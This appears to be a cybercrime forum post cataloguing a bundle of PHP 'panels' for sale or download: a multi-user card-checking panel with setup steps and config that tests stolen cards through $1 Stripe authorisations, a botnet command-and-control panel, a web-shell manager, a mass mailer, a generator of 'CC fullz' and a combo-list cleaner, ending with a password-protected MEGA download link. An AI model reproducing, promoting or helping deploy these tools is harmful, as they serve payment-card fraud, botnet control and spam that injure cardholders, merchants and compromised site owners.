PANEL CATALOG
| Panel | Function | PHP Ver | Requires | Size | Est. Setup Time |
| StripeCheck Panel | Multi-user card checking web UI | 8.1+ | MySQL + Stripe API keys | 2.5 MB | 30 min |
| PhantomMailer | Mass SMTP sender with open/click tracking | 8.0+ | SMTP servers + MySQL | 3.2 MB | 20 min |
| ShellManager | Web UI for managing deployed shells | 7.4+ | MySQL | 1.8 MB | 15 min |
| BotNet Lite | Lightweight C2 panel for bot management | 8.0+ | MySQL + WebSocket server | 5.0 MB | 1 hour |
| AutoCCGen | Auto-generated CC fullz via web | 8.1+ | MySQL + BIN database | 1.2 MB | 10 min |
| ProxyRotator | Proxy management + rotation API | 8.0+ | MySQL | 900 KB | 15 min |
| WPScanner Pro | WordPress vulnerability scanner panel | 8.0+ | MySQL + WP API | 2.0 MB | 20 min |
| ComboDedup | Combo cleaning + dedup web panel | 8.0+ | MySQL | 1.5 MB | 10 min |
STRIPECHECK PANEL SETUP
Code:
1. Upload files to your web server (Apache/Nginx)
2. Import database: mysql -u root -p dbname < stripecheck.sql
3. Edit config.php:
define('DB_HOST', 'localhost');
define('DB_USER', 'panel_user');
define('DB_PASS', 'strong_password');
define('DB_NAME', 'stripecheck');
define('STRIPE_SECRET_KEY', 'sk_live_...');
define('STRIPE_WEBHOOK_SECRET', 'whsec_...');
define('ADMIN_USER', 'admin');
define('ADMIN_PASS', password_hash('yourpassword', PASSWORD_BCRYPT));
4. Set up webhook: stripe webhook endpoint β https://yourdomain.com/webhook.php
5. Add users: /admin/users.php
6. Each user gets: API key β used in OB2/checker with webhook receipt
Features:
- Multi-user with usage limits per user
- Real-time card checking via webhook
- Hit log: all successful charges with details
- Balance tracking: deduct per check
- BIN filtering: block specific BINs
- Proxy pool management
- Auto-void: $1 auth β void automatically
- Statistics dashboard: hits by gateway, BIN, country
DOWNLOAD
Code:
All panels: [URL="https://mega.nz/file/BlackSec_PHP_Panels_July2026"]File on MEGA[/URL]
Size: 18 MB | Password: PHPpanels2026
Includes: Source code + SQL dumps + setup guides + sample configs + README for each